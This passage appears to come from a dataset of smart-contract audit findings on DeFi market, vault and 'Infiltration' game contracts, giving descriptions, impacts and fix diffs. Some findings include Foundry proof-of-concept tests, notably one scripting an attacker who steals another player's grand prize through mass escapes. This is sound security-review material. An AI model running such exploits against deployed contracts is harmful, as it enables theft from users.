.sub(Fixed6Lib.from(newPendingPosition.keeper));\\n \\n context.closable = context.closable\\n .sub(context.previousPendingMagnitude\\n .sub(newPendingPosition.magnitude().min(context.previousPendingMagnitude)));\\n context.previousPendingMagnitude = newPendingPosition.magnitude();\\n\\n if (context.previousPendingMagnitude.gt(context.maxPendingMagnitude))\\n context.maxPendingMagnitude = newPendingPosition.magnitude();\\n }\\n```\\n\\nIt will loop through `pendingPostion`, and each loop will set the variable `context.previousPendingMagnitude = newPendingPosition.magnitude();` to be used as the basis for the calculation of the next `pendingPostion`.\\n`closableAmount` is also calculated in `MultiInvoker._latest()`. The current implementation is as follows:\\n```\\n function _latest(\\n IMarket market,\\n address account\\n ) internal view returns (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) {\\n // load latest price\\n OracleVersion memory latestOracleVersion = market.oracle().latest();\\n latestPrice = latestOracleVersion.price;\\n IPayoffProvider payoff = market.payoff();\\n if (address(payoff) != address(0)) latestPrice = payoff.payoff(latestPrice);\\n\\n // load latest settled position\\n uint256 latestTimestamp = latestOracleVersion.timestamp;\\n latestPosition = market.positions(account);\\n closableAmount = latestPosition.magnitude();\\n UFixed6 previousMagnitude = closableAmount;\\n\\n // scan pending position for any ready-to-be-settled positions\\n Local memory local = market.locals(account);\\n for (uint256 id = local.latestId + 1; id <= local.currentId; id++) {\\n\\n // load pending position\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n pendingPosition.adjust(latestPosition);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!market.oracle().at(pendingPosition.timestamp).valid) latestPosition.invalidate(pendingPosition);\\n latestPosition.update(pendingPosition);\\n\\n previousMagnitude = latestPosition.magnitude();\\n closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n previousMagnitude = latestPosition.magnitude();\\n }\\n }\\n }\\n```\\n\\nThis method also loops through `pendingPosition`, but incorrectly uses `latestPosition.magnitude()` to set `previousMagnitude`, `previousMagnitude` = latestPosition.magnitude();. The correct way should be `previousMagnitude = currentPendingPosition.magnitude()` like `market.sol`. This mistake leads to an incorrect calculation of `closableAmount`.","```\\n function _latest(\\n IMarket market,\\n address account\\n ) internal view returns (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) {\\n // load latest price\\n OracleVersion memory latestOracleVersion = market.oracle().latest();\\n latestPrice = latestOracleVersion.price;\\n IPayoffProvider payoff = market.payoff();\\n if (address(payoff) != address(0)) latestPrice = payoff.payoff(latestPrice);\\n\\n // load latest settled position\\n uint256 latestTimestamp = latestOracleVersion.timestamp;\\n latestPosition = market.positions(account);\\n closableAmount = latestPosition.magnitude();\\n UFixed6 previousMagnitude = closableAmount;\\n\\n // scan pending position for any ready// Remove the line below\\nto// Remove the line below\\nbe// Remove the line below\\nsettled positions\\n Local memory local = market.locals(account);\\n for (uint256 id = local.latestId // Add the line below\\n 1; id <= local.currentId; id// Add the line below\\n// Add the line below\\n) {\\n\\n // load pending position\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n pendingPosition.adjust(latestPosition);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!market.oracle().at(pendingPosition.timestamp).valid) latestPosition.invalidate(pendingPosition);\\n latestPosition.update(pendingPosition);\\n\\n previousMagnitude = latestPosition.magnitude();\\n closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n// Remove the line below\\n previousMagnitude = latestPosition.magnitude();\\n// Add the line below\\n previousMagnitude = pendingPosition.magnitude();\\n }\\n }\\n }\\n```\\n","The calculation of `closableAmount` is incorrect, which leads to errors in the judgments that use this variable, such as `_liquidationFee()`.","```\\n function _processPendingPosition(Context memory context, Position memory newPendingPosition) private {\\n context.pendingCollateral = context.pendingCollateral\\n .sub(newPendingPosition.fee)\\n .sub(Fixed6Lib.from(newPendingPosition.keeper));\\n \\n context.closable = context.closable\\n .sub(context.previousPendingMagnitude\\n .sub(newPendingPosition.magnitude().min(context.previousPendingMagnitude)));\\n context.previousPendingMagnitude = newPendingPosition.magnitude();\\n\\n if (context.previousPendingMagnitude.gt(context.maxPendingMagnitude))\\n context.maxPendingMagnitude = newPendingPosition.magnitude();\\n }\\n```\\n" +interfaceFee Incorrectly converted uint40 when stored,medium,"The `interfaceFee.amount` is currently defined as `uint48` , with a maximum value of approximately `281m`. However, it is incorrectly converted to `uint40` when saved, `uint40(UFixed6.unwrap(newValue.interfaceFee.amount))`, which means the maximum value can only be approximately `1.1M`. If a user sets an order where `interfaceFee.amount` is greater than `1.1M`, the order can be saved successfully but the actual stored value may be truncated to `0`. This is not what the user expects, and the user may think that the order has been set, but in reality, it is an incorrect order. Although a fee of `1.1M` is large, it is not impossible.\\n`interfaceFee.amount` is defined as `uint48` the legality check also uses `type(uint48).max`, but `uint40` is used when saving.\\n```\\nstruct StoredTriggerOrder {\\n /* slot 0 */\\n uint8 side; // 0 = maker, 1 = long, 2 = short, 3 = collateral\\n int8 comparison; // -2 = lt, -1 = lte, 0 = eq, 1 = gte, 2 = gt\\n uint64 fee; // <= 18.44tb\\n int64 price; // <= 9.22t\\n int64 delta; // <= 9.22t\\n uint48 interfaceFeeAmount; // <= 281m\\n\\n /* slot 1 */\\n address interfaceFeeReceiver;\\n bool interfaceFeeUnwrap;\\n bytes11 __unallocated0__;\\n}\\n\\nlibrary TriggerOrderLib {\\n function store(TriggerOrderStorage storage self, TriggerOrder memory newValue) internal {\\n if (newValue.side > type(uint8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison > type(int8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison < type(int8).min) revert TriggerOrderStorageInvalidError();\\n if (newValue.fee.gt(UFixed6.wrap(type(uint64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.interfaceFee.amount.gt(UFixed6.wrap(type(uint48).max))) revert TriggerOrderStorageInvalidError();\\n\\n self.value = StoredTriggerOrder(\\n uint8(newValue.side),\\n int8(newValue.comparison),\\n uint64(UFixed6.unwrap(newValue.fee)),\\n int64(Fixed6.unwrap(newValue.price)),\\n int64(Fixed6.unwrap(newValue.delta)),\\n uint40(UFixed6.unwrap(newValue.interfaceFee.amount)),\\n newValue.interfaceFee.receiver,\\n newValue.interfaceFee.unwrap,\\n bytes11(0)\\n );\\n }\\n```\\n\\nWe can see that when saving, it is forcibly converted to `uint40`, as in `uint40(UFixed6.unwrap(newValue.interfaceFee.amount))`. The order can be saved successfully, but the actual storage may be truncated to `0`.","```\\nlibrary TriggerOrderLib {\\n function store(TriggerOrderStorage storage self, TriggerOrder memory newValue) internal {\\n if (newValue.side > type(uint8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison > type(int8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison < type(int8).min) revert TriggerOrderStorageInvalidError();\\n if (newValue.fee.gt(UFixed6.wrap(type(uint64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.interfaceFee.amount.gt(UFixed6.wrap(type(uint48).max))) revert TriggerOrderStorageInvalidError();\\n\\n self.value = StoredTriggerOrder(\\n uint8(newValue.side),\\n int8(newValue.comparison),\\n uint64(UFixed6.unwrap(newValue.fee)),\\n int64(Fixed6.unwrap(newValue.price)),\\n int64(Fixed6.unwrap(newValue.delta)),\\n// Remove the line below\\n uint40(UFixed6.unwrap(newValue.interfaceFee.amount)),\\n// Add the line below\\n uint48(UFixed6.unwrap(newValue.interfaceFee.amount)),\\n newValue.interfaceFee.receiver,\\n newValue.interfaceFee.unwrap,\\n bytes11(0)\\n );\\n }\\n```\\n","For orders where `interfaceFee.amount` is greater than `1.1M`, the order can be saved successfully, but the actual storage may be truncated to `0`. This is not what users expect and may lead to incorrect fee payments when the order is executed. Although a fee of `1.1M` is large, it is not impossible.","```\\nstruct StoredTriggerOrder {\\n /* slot 0 */\\n uint8 side; // 0 = maker, 1 = long, 2 = short, 3 = collateral\\n int8 comparison; // -2 = lt, -1 = lte, 0 = eq, 1 = gte, 2 = gt\\n uint64 fee; // <= 18.44tb\\n int64 price; // <= 9.22t\\n int64 delta; // <= 9.22t\\n uint48 interfaceFeeAmount; // <= 281m\\n\\n /* slot 1 */\\n address interfaceFeeReceiver;\\n bool interfaceFeeUnwrap;\\n bytes11 __unallocated0__;\\n}\\n\\nlibrary TriggerOrderLib {\\n function store(TriggerOrderStorage storage self, TriggerOrder memory newValue) internal {\\n if (newValue.side > type(uint8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison > type(int8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison < type(int8).min) revert TriggerOrderStorageInvalidError();\\n if (newValue.fee.gt(UFixed6.wrap(type(uint64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.interfaceFee.amount.gt(UFixed6.wrap(type(uint48).max))) revert TriggerOrderStorageInvalidError();\\n\\n self.value = StoredTriggerOrder(\\n uint8(newValue.side),\\n int8(newValue.comparison),\\n uint64(UFixed6.unwrap(newValue.fee)),\\n int64(Fixed6.unwrap(newValue.price)),\\n int64(Fixed6.unwrap(newValue.delta)),\\n uint40(UFixed6.unwrap(newValue.interfaceFee.amount)),\\n newValue.interfaceFee.receiver,\\n newValue.interfaceFee.unwrap,\\n bytes11(0)\\n );\\n }\\n```\\n" +"vault.claimReward() If have a market without reward token, it may cause all markets to be unable to retrieve rewards.",medium,"In `vault.claimReward()`, it will loop through all `market` of `vault` to execute `claimReward()`, and transfer `rewards` to `factory().owner()`. If one of the markets does not have `rewards`, that is, `rewardToken` is not set, `Token18 reward = address(0)`. Currently, the loop does not make this judgment `reward != address(0)`, it will also execute `market.claimReward()`, and the entire method will `revert`. This leads to other markets with `rewards` also being unable to retrieve `rewards`.\\nThe current implementation of `vault.claimReward()` is as follows:\\n```\\n function claimReward() external onlyOwner {\\n for (uint256 marketId; marketId < totalMarkets; marketId++) {\\n _registrations[marketId].read().market.claimReward();\\n _registrations[marketId].read().market.reward().push(factory().owner());\\n }\\n }\\n```\\n\\nWe can see that the method loops through all the `market` and executes `market.claimReward()`, and `reward().push()`.\\nThe problem is, not every market has `rewards` tokens. market.sol's `rewards` are not forcibly set in `initialize()`. The market's `makerRewardRate.makerRewardRate` is also allowed to be 0.\\n```\\ncontract Market is IMarket, Instance, ReentrancyGuard {\\n /// @dev The token that incentive rewards are paid in\\n Token18 public reward;\\n\\n function initialize(IMarket.MarketDefinition calldata definition_) external initializer(1) {\\n __Instance__initialize();\\n __ReentrancyGuard__initialize();\\n\\n token = definition_.token;\\n oracle = definition_.oracle;\\n payoff = definition_.payoff;\\n }\\n// rest of code\\n\\n\\nlibrary MarketParameterStorageLib {\\n// rest of code\\n function validate(\\n MarketParameter memory self,\\n ProtocolParameter memory protocolParameter,\\n Token18 reward\\n ) public pure {\\n if (self.settlementFee.gt(protocolParameter.maxFeeAbsolute)) revert MarketParameterStorageInvalidError();\\n\\n if (self.fundingFee.max(self.interestFee).max(self.positionFee).gt(protocolParameter.maxCut))\\n revert MarketParameterStorageInvalidError();\\n\\n if (self.oracleFee.add(self.riskFee).gt(UFixed6Lib.ONE)) revert MarketParameterStorageInvalidError();\\n\\n if (\\n reward.isZero() &&\\n (!self.makerRewardRate.isZero() || !self.longRewardRate.isZero() || !self.shortRewardRate.isZero())\\n ) revert MarketParameterStorageInvalidError();\\n```\\n\\nThis means that `market.sol` can be without `rewards token`.\\nIf there is such a market, the current `vault.claimReward()` will `revert`, causing other markets with `rewards` to also be unable to retrieve `rewards`.",```\\n function claimReward() external onlyOwner {\\n for (uint256 marketId; marketId < totalMarkets; marketId// Add the line below\\n// Add the line below\\n) {\\n// Add the line below\\n if (_registrations[marketId].read().market.reward().isZero()) continue;\\n _registrations[marketId].read().market.claimReward();\\n _registrations[marketId].read().market.reward().push(factory().owner());\\n }\\n }\\n```\\n,"If the `vault` contains markets without `rewards`, it will cause other markets with `rewards` to also be unable to retrieve `rewards`.",```\\n function claimReward() external onlyOwner {\\n for (uint256 marketId; marketId < totalMarkets; marketId++) {\\n _registrations[marketId].read().market.claimReward();\\n _registrations[marketId].read().market.reward().push(factory().owner());\\n }\\n }\\n```\\n +_killWoundedAgents,high,"The `_killWoundedAgents` function only checks the status of the agent, not when it was wounded.\\n```\\n function _killWoundedAgents(\\n uint256 roundId,\\n uint256 currentRoundAgentsAlive\\n ) private returns (uint256 deadAgentsCount) {\\n // rest of code\\n for (uint256 i; i < woundedAgentIdsCount; ) {\\n uint256 woundedAgentId = woundedAgentIdsInRound[i.unsafeAdd(1)];\\n\\n uint256 index = agentIndex(woundedAgentId);\\n if (agents[index].status == AgentStatus.Wounded) {\\n // rest of code\\n }\\n\\n // rest of code\\n }\\n\\n emit Killed(roundId, woundedAgentIds);\\n }\\n```\\n\\nSo when `fulfillRandomWords` kills agents that were wounded and unhealed at round `currentRoundId - ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD`, it will also kill the agent who was healed and wounded again after that round.\\nAlso, since `fulfillRandomWords` first draws the new wounded agents before kills agents, in the worst case scenario, agent could die immediately after being wounded in this round.\\n```\\nif (activeAgents > NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS) {\\n uint256 woundedAgents = _woundRequestFulfilled(\\n currentRoundId,\\n currentRoundAgentsAlive,\\n activeAgents,\\n currentRandomWord\\n );\\n\\n uint256 deadAgentsFromKilling;\\n if (currentRoundId > ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD) {\\n deadAgentsFromKilling = _killWoundedAgents({\\n roundId: currentRoundId.unsafeSubtract(ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD),\\n currentRoundAgentsAlive: currentRoundAgentsAlive\\n });\\n }\\n```\\n\\nThis is the PoC test code. You can add it to the Infiltration.fulfillRandomWords.t.sol file and run it.\\n```\\nfunction test_poc() public {\\n\\n _startGameAndDrawOneRound();\\n\\n uint256[] memory randomWords = _randomWords();\\n uint256[] memory woundedAgentIds;\\n\\n for (uint256 roundId = 2; roundId <= ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD + 1; roundId++) {\\n\\n if(roundId == 2) { // heal agent. only woundedAgentIds[0] dead.\\n (woundedAgentIds, ) = infiltration.getRoundInfo({roundId: 1});\\n assertEq(woundedAgentIds.length, 20);\\n\\n _drawXRounds(1);\\n\\n _heal({roundId: 3, woundedAgentIds: woundedAgentIds});\\n\\n _startNewRound();\\n\\n // everyone except woundedAgentIds[0] is healed\\n uint256 agentIdThatWasKilled = woundedAgentIds[0];\\n\\n IInfiltration.HealResult[] memory healResults = new IInfiltration.HealResult[](20);\\n for (uint256 i; i < 20; i++) {\\n healResults[i].agentId = woundedAgentIds[i];\\n\\n if (woundedAgentIds[i] == agentIdThatWasKilled) {\\n healResults[i].outcome = IInfiltration.HealOutcome.Killed;\\n } else {\\n healResults[i].outcome = IInfiltration.HealOutcome.Healed;\\n }\\n }\\n\\n expectEmitCheckAll();\\n emit HealRequestFulfilled(3, healResults);\\n\\n expectEmitCheckAll();\\n emit RoundStarted(4);\\n\\n randomWords[0] = (69 * 10_000_000_000) + 9_900_000_000; // survival rate 99%, first one gets killed\\n\\n vm.prank(VRF_COORDINATOR);\\n VRFConsumerBaseV2(address(infiltration)).rawFulfillRandomWords(_computeVrfRequestId(3), randomWords);\\n\\n for (uint256 i; i < woundedAgentIds.length; i++) {\\n if (woundedAgentIds[i] != agentIdThatWasKilled) {\\n _assertHealedAgent(woundedAgentIds[i]);\\n }\\n }\\n\\n roundId += 2; // round 2, 3 used for healing\\n }\\n\\n _startNewRound();\\n\\n // Just so that each round has different random words\\n randomWords[0] += roundId;\\n\\n if (roundId == ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD + 1) { // wounded agents at round 1 are healed, only woundedAgentIds[0] was dead.\\n (uint256[] memory woundedAgentIdsFromRound, ) = infiltration.getRoundInfo({\\n roundId: uint40(roundId - ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD)\\n });\\n\\n // find re-wounded agent after healed\\n uint256[] memory woundedAfterHeal = new uint256[](woundedAgentIds.length);\\n uint256 totalWoundedAfterHeal;\\n for (uint256 i; i < woundedAgentIds.length; i ++){\\n uint256 index = infiltration.agentIndex(woundedAgentIds[i]);\\n IInfiltration.Agent memory agent = infiltration.getAgent(index);\\n if (agent.status == IInfiltration.AgentStatus.Wounded) {\\n woundedAfterHeal[i] = woundedAgentIds[i]; // re-wounded agent will be killed\\n totalWoundedAfterHeal++;\\n }\\n else{\\n woundedAfterHeal[i] = 0; // set not wounded again 0\\n }\\n\\n }\\n expectEmitCheckAll();\\n emit Killed(roundId - ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD, woundedAfterHeal);\\n }\\n\\n expectEmitCheckAll();\\n emit RoundStarted(roundId + 1);\\n\\n uint256 requestId = _computeVrfRequestId(uint64(roundId));\\n vm.prank(VRF_COORDINATOR);\\n VRFConsumerBaseV2(address(infiltration)).rawFulfillRandomWords(requestId, randomWords);\\n }\\n}\\n```\\n","Check woundedAt at `_killWoundedAgents`\\n```\\n function _killWoundedAgents(\\n uint256 roundId,\\n uint256 currentRoundAgentsAlive\\n ) private returns (uint256 deadAgentsCount) {\\n // rest of code\\n for (uint256 i; i < woundedAgentIdsCount; ) {\\n uint256 woundedAgentId = woundedAgentIdsInRound[i.unsafeAdd(1)];\\n\\n uint256 index = agentIndex(woundedAgentId);\\n// Remove the line below\\n if (agents[index].status == AgentStatus.Wounded) {\\n// Add the line below\\n if (agents[index].status == AgentStatus.Wounded && agents[index].woundedAt == roundId) {\\n // rest of code\\n }\\n\\n // rest of code\\n }\\n\\n emit Killed(roundId, woundedAgentIds);\\n }\\n```\\n","The user pays tokens to keep the agent alive, but agent will die even if agent success to healed. The user has lost tokens and is forced out of the game.","```\\n function _killWoundedAgents(\\n uint256 roundId,\\n uint256 currentRoundAgentsAlive\\n ) private returns (uint256 deadAgentsCount) {\\n // rest of code\\n for (uint256 i; i < woundedAgentIdsCount; ) {\\n uint256 woundedAgentId = woundedAgentIdsInRound[i.unsafeAdd(1)];\\n\\n uint256 index = agentIndex(woundedAgentId);\\n if (agents[index].status == AgentStatus.Wounded) {\\n // rest of code\\n }\\n\\n // rest of code\\n }\\n\\n emit Killed(roundId, woundedAgentIds);\\n }\\n```\\n" +Attacker can steal reward of actual winner by force ending the game,high,"Currently following scenario is possible: There is an attacker owning some lower index agents and some higher index agents. There is a normal user owing one agent with an index between the attackers agents. If one of the attackers agents with an lower index gets wounded, he can escape all other agents and will instantly win the game, even if the other User has still one active agent.\\nThis is possible because because the winner is determined by the agent index, and escaping all agents at once wont kill the wounded agent because the game instantly ends.\\nFollowing check inside startNewRound prevents killing of wounded agents by starting a new round:\\n```\\nuint256 activeAgents = gameInfo.activeAgents;\\n if (activeAgents == 1) {\\n revert GameOver();\\n }\\n```\\n\\nFollowing check inside of claimPrize pays price to first ID agent:\\n```\\nuint256 agentId = agents[1].agentId;\\n_assertAgentOwnership(agentId);\\n```\\n\\nSee following POC:\\nPOC\\nPut this into Infiltration.mint.t.sol and run `forge test --match-test forceWin -vvv`\\n```\\nfunction test_forceWin() public {\\n address attacker = address(1337);\\n\\n //prefund attacker and user1\\n vm.deal(user1, PRICE * MAX_MINT_PER_ADDRESS);\\n vm.deal(attacker, PRICE * MAX_MINT_PER_ADDRESS);\\n\\n // MINT some agents\\n vm.warp(_mintStart());\\n // attacker wants to make sure he owns a bunch of agents with low IDs!!\\n vm.prank(attacker);\\n infiltration.mint{value: PRICE * 30}({quantity: 30});\\n // For simplicity we mint only 1 agent to user 1 here, but it could be more, they could get wounded, etc.\\n vm.prank(user1);\\n infiltration.mint{value: PRICE *1}({quantity: 1});\\n //Attacker also wants a bunch of agents with the highest IDs, as they are getting swapped with the killed agents (move forward)\\n vm.prank(attacker);\\n infiltration.mint{value: PRICE * 30}({quantity: 30});\\n \\n vm.warp(_mintEnd());\\n\\n //start the game\\n vm.prank(owner);\\n infiltration.startGame();\\n\\n vm.prank(VRF_COORDINATOR);\\n uint256[] memory randomWords = new uint256[](1);\\n randomWords[0] = 69_420;\\n VRFConsumerBaseV2(address(infiltration)).rawFulfillRandomWords(_computeVrfRequestId(1), randomWords);\\n // Now we are in round 2 we do have 1 wounded agent (but we can imagine any of our agent got wounded, doesn´t really matter)\\n \\n // we know with our HARDCODED RANDOMNESS THAT AGENT 3 gets wounded!!\\n\\n // Whenever we get in a situation, that we own all active agents, but 1 and our agent has a lower index we can instant win the game!!\\n // This is done by escaping all agents, at once, except the lowest index\\n uint256[] memory escapeIds = new uint256[](59);\\n escapeIds[0] = 1;\\n escapeIds[1] = 2;\\n uint256 i = 4; //Scipping our wounded AGENT 3\\n for(; i < 31;) {\\n escapeIds[i-2] = i;\\n unchecked {++i;}\\n }\\n //skipping 31 as this owned by user1\\n unchecked {++i;}\\n for(; i < 62;) {\\n escapeIds[i-3] = i;\\n unchecked {++i;}\\n }\\n vm.prank(attacker);\\n infiltration.escape(escapeIds);\\n\\n (uint16 activeAgents, uint16 woundedAgents, , uint16 deadAgents, , , , , , , ) = infiltration.gameInfo();\\n console.log(""Active"", activeAgents);\\n assertEq(activeAgents, 1);\\n // This will end the game instantly.\\n //owner should not be able to start new round\\n vm.roll(block.number + BLOCKS_PER_ROUND);\\n vm.prank(owner);\\n vm.expectRevert();\\n infiltration.startNewRound();\\n\\n //Okay so the game is over, makes sense!\\n // Now user1 has the only active AGENT, so he should claim the grand prize!\\n // BUT user1 cannot\\n vm.expectRevert(IInfiltration.NotAgentOwner.selector);\\n vm.prank(user1);\\n infiltration.claimGrandPrize();\\n\\n //instead the attacker can:\\n vm.prank(attacker);\\n infiltration.claimGrandPrize();\\n \\n```\\n",Start a new Round before the real end of game to clear all wounded agents and reorder IDs.,"Attacker can steal the grand price of the actual winner by force ending the game trough escapes.\\nThis also introduces problems if there are other players with wounded agents but lower < 50 TokenID, they can claim prices for wounded agents, which will break parts of the game logic.",```\\nuint256 activeAgents = gameInfo.activeAgents;\\n if (activeAgents == 1) {\\n revert GameOver();\\n }\\n```\\n +Agents with Healing Opportunity Will Be Terminated Directly if The `escape` Reduces activeAgents to the Number of `NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS` or Fewer,medium,"In each round, agents have the opportunity to either `escape` or `heal` before the `_requestForRandomness` function is called. However, the order of execution between these two functions is not specified, and anyone can be executed at any time just before `startNewRound`. Typically, this isn't an issue. However, the problem arises when there are only a few Active Agents left in the game.\\nOn one hand, the `heal` function requires that the number of `gameInfo.activeAgents` is greater than `NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS`.\\n```\\n function heal(uint256[] calldata agentIds) external nonReentrant {\\n _assertFrontrunLockIsOff();\\n//@audit If there are not enough activeAgents, heal is disabled\\n if (gameInfo.activeAgents <= NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS) {\\n revert HealingDisabled();\\n }\\n```\\n\\nOn the other hand, the `escape` function will directly set the status of agents to ""ESCAPE"" and reduce the count of `gameInfo.activeAgents`.\\n```\\n function escape(uint256[] calldata agentIds) external nonReentrant {\\n _assertFrontrunLockIsOff();\\n\\n uint256 agentIdsCount = agentIds.length;\\n _assertNotEmptyAgentIdsArrayProvided(agentIdsCount);\\n\\n uint256 activeAgents = gameInfo.activeAgents;\\n uint256 activeAgentsAfterEscape = activeAgents - agentIdsCount;\\n _assertGameIsNotOverAfterEscape(activeAgentsAfterEscape);\\n\\n uint256 currentRoundAgentsAlive = agentsAlive();\\n\\n uint256 prizePool = gameInfo.prizePool;\\n uint256 secondaryPrizePool = gameInfo.secondaryPrizePool;\\n uint256 reward;\\n uint256[] memory rewards = new uint256[](agentIdsCount);\\n\\n for (uint256 i; i < agentIdsCount; ) {\\n uint256 agentId = agentIds[i];\\n _assertAgentOwnership(agentId);\\n\\n uint256 index = agentIndex(agentId);\\n _assertAgentStatus(agents[index], agentId, AgentStatus.Active);\\n\\n uint256 totalEscapeValue = prizePool / currentRoundAgentsAlive;\\n uint256 rewardForPlayer = (totalEscapeValue * _escapeMultiplier(currentRoundAgentsAlive)) /\\n ONE_HUNDRED_PERCENT_IN_BASIS_POINTS;\\n rewards[i] = rewardForPlayer;\\n reward += rewardForPlayer;\\n\\n uint256 rewardToSecondaryPrizePool = (totalEscapeValue.unsafeSubtract(rewardForPlayer) *\\n _escapeRewardSplitForSecondaryPrizePool(currentRoundAgentsAlive)) / ONE_HUNDRED_PERCENT_IN_BASIS_POINTS;\\n\\n unchecked {\\n prizePool = prizePool - rewardForPlayer - rewardToSecondaryPrizePool;\\n }\\n secondaryPrizePool += rewardToSecondaryPrizePool;\\n\\n _swap({\\n currentAgentIndex: index,\\n lastAgentIndex: currentRoundAgentsAlive,\\n agentId: agentId,\\n newStatus: AgentStatus.Escaped\\n });\\n\\n unchecked {\\n --currentRoundAgentsAlive;\\n ++i;\\n }\\n }\\n\\n // This is equivalent to\\n // unchecked {\\n // gameInfo.activeAgents = uint16(activeAgentsAfterEscape);\\n // gameInfo.escapedAgents += uint16(agentIdsCount);\\n // }\\n```\\n\\nThrerefore, if the `heal` function is invoked first then the corresponding Wounded Agents will be healed in function `fulfillRandomWords`. If the `escape` function is invoked first and the number of `gameInfo.activeAgents` becomes equal to or less than `NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS`, the `heal` function will be disable. This obviously violates the fairness of the game.\\nExample\\nConsider the following situation:\\nAfter Round N, there are 100 agents alive. And, 1 Active Agent wants to `escape` and 10 Wounded Agents want to `heal`.\\nRound N:\\nActive Agents: 51\\nWounded Agents: 49\\nHealing Agents: 0\\nAccording to the order of execution, there are two situations. Please note that the result is calculated only after `_healRequestFulfilled`, so therer are no new wounded or dead agents\\nFirst, invoking `escape` before `heal`. `heal` is disable and all Wounded Agents are killed because there are not enough Active Agents.\\nRound N+1:\\nActive Agents: 50\\nWounded Agents: 0\\nHealing Agents: 0\\nSecond, invoking `heal` before `escape`. Suppose that `heal` saves 5 agents, and we got:\\nRound N+1:\\nActive Agents: 55\\nWounded Agents: 39\\nHealing Agents: 0\\nObviously, different execution orders lead to drastically different outcomes, which affects the fairness of the game.",It is advisable to ensure that the `escape` function is always called after the `heal` function in every round. This guarantees that every wounded agent has the opportunity to `heal` themselves when there are a sufficient number of `activeAgents` at the start of each round. This approach can enhance fairness and gameplay balance.,"If some Active Agents choose to escape, causing the count of `activeAgents` to become equal to or less than `NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS`, the Wounded Agents will lose their final chance to heal themselves.\\nThis situation can significantly impact the game's fairness. The Wounded Agents would have otherwise had the opportunity to heal themselves and continue participating in the game. However, the escape of other agents leads to their immediate termination, depriving them of that chance.","```\\n function heal(uint256[] calldata agentIds) external nonReentrant {\\n _assertFrontrunLockIsOff();\\n//@audit If there are not enough activeAgents, heal is disabled\\n if (gameInfo.activeAgents <= NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS) {\\n revert HealingDisabled();\\n }\\n```\\n" +Wound agent can't invoke heal in the next round,medium,"Assume players being marked as wounded in the round `12` , players cannot invoke `heal` in the next round 13\\n```\\n function test_heal_in_next_round_v1() public {\\n _startGameAndDrawOneRound();\\n\\n _drawXRounds(11);\\n\\n\\n (uint256[] memory woundedAgentIds, ) = infiltration.getRoundInfo({roundId: 12});\\n\\n address agentOwner = _ownerOf(woundedAgentIds[0]);\\n looks.mint(agentOwner, HEAL_BASE_COST);\\n\\n vm.startPrank(agentOwner);\\n _grantLooksApprovals();\\n looks.approve(TRANSFER_MANAGER, HEAL_BASE_COST);\\n\\n uint256[] memory agentIds = new uint256[](1);\\n agentIds[0] = woundedAgentIds[0];\\n\\n uint256[] memory costs = new uint256[](1);\\n costs[0] = HEAL_BASE_COST;\\n\\n //get gameInfo\\n (,,,,,uint40 currentRoundId,,,,,) = infiltration.gameInfo();\\n assert(currentRoundId == 13);\\n\\n //get agent Info\\n IInfiltration.Agent memory agentInfo = infiltration.getAgent(woundedAgentIds[0]);\\n assert(agentInfo.woundedAt == 12);\\n\\n //agent can't invoke heal in the next round.\\n vm.expectRevert(IInfiltration.HealingMustWaitAtLeastOneRound.selector);\\n infiltration.heal(agentIds);\\n }\\n```\\n",```\\n // No need to check if the heal deadline has passed as the agent would be killed\\n unchecked {\\n- if (currentRoundId - woundedAt < 2) {\\n- if (currentRoundId - woundedAt < 1) {\\n revert 